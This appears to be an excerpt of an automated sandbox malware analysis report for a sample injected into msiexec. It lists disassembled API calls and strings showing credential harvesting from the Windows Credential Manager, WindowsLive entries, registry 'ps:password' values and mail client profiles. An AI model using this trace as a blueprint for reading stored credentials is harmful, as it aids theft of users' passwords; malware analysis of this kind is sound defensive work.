                                                                                                        • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                        • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$strlen
                                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                                        • API String ID: 2619041689-3408036318
                                                                                                        APIs
                                                                                                          • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                          • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                        • wcslen.MSVCRT ref: 0040874A
                                                                                                        • wcsncmp.MSVCRT ref: 00408794
                                                                                                        • memset.MSVCRT ref: 0040882A
                                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                        • wcschr.MSVCRT ref: 0040889F
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                        • String ID: J$Microsoft_WinInet
                                                                                                        • API String ID: 3318079752-260894208
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004037EB
                                                                                                        • memset.MSVCRT ref: 004037FF
                                                                                                          • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        • strchr.MSVCRT ref: 0040386E
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                        • strlen.MSVCRT ref: 00403897
                                                                                                        • sprintf.MSVCRT ref: 004038B7
                                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                        • String ID: %s@yahoo.com
                                                                                                        • API String ID: 2240714685-3288273942
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                        • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                        • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                          • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                        • API String ID: 888011440-2039793938
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • database %s is already in use, xrefs: 0042E9CE
                                                                                                        • unable to open database: %s, xrefs: 0042EBD6
                                                                                                        • database is already attached, xrefs: 0042EA97
                                                                                                        • too many attached databases - max %d, xrefs: 0042E951
                                                                                                        • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                        • out of memory, xrefs: 0042EBEF
                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                        • strchr.MSVCRT ref: 0040327B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringstrchr
                                                                                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                        • API String ID: 1348940319-1729847305
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                        • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                        • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                        • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                        • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040F567
                                                                                                        • memset.MSVCRT ref: 0040F57F
                                                                                                          • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                        • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 78143705-3916222277
                                                                                                        • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                        • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                        • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                        • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                        APIs
                                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                        • memset.MSVCRT ref: 0040FA1E
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                        • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                        • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                        • API String ID: 945165440-3589380929
                                                                                                        • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                        • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                        • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                        • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040F84A
                                                                                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                        • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                        • String ID: Creds$ps:password
                                                                                                        • API String ID: 2290531041-1872227768
                                                                                                        • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                        • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                        • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                        • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                          • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                          • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                        • strchr.MSVCRT ref: 0040371F
                                                                                                        • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                        • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                        • strlen.MSVCRT ref: 00403778
                                                                                                        • sprintf.MSVCRT ref: 0040379C
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                        • String ID: %s@gmail.com
                                                                                                        • API String ID: 3261640601-4097000612
                                                                                                        • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                        • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                        • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                        • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004094C8
                                                                                                        • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                        • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                        • memset.MSVCRT ref: 0040950C
                                                                                                        • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                        • _strcmpi.MSVCRT ref: 00409531
                                                                                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                        • String ID: sysdatetimepick32
                                                                                                        • API String ID: 3411445237-4169760276
                                                                                                        • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                        • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                        • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                        • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403504
                                                                                                        • memset.MSVCRT ref: 0040351A
                                                                                                        • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                        • _mbscat.MSVCRT ref: 0040356D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                        • API String ID: 632640181-966475738
                                                                                                        • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                        • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                        • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                        • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                        APIs
                                                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                        • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                        • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                        • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                        • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                        • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                        • String ID:
                                                                                                        • API String ID: 3642520215-0
                                                                                                        • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                        • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                        • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                        • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                        • GetDC.USER32(00000000), ref: 004072FB
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                        • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                        • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1999381814-0
                                                                                                        • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                        • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                        • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                        • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                        • API String ID: 1297977491-3883738016
                                                                                                        • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                        • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                        • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                        • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                        APIs
                                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: gj
                                                                                                        • API String ID: 438689982-4203073231
                                                                                                        • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                        • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                        • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                        • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm$__aullrem
                                                                                                        • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                        • API String ID: 643879872-978417875
                                                                                                        • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                        • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                        • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                        • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                        • memset.MSVCRT ref: 004058C3
                                                                                                        • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                        • SetFocus.USER32(?), ref: 00405976
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4281309102-0
                                                                                                        • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                        • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                        • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                        • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                        • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                        • sprintf.MSVCRT ref: 0040A921
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                        • API String ID: 1631269929-4153097237
                                                                                                        • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                        • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                        • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                        • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040810E
                                                                                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CB7B60,?), ref: 004081B9
                                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
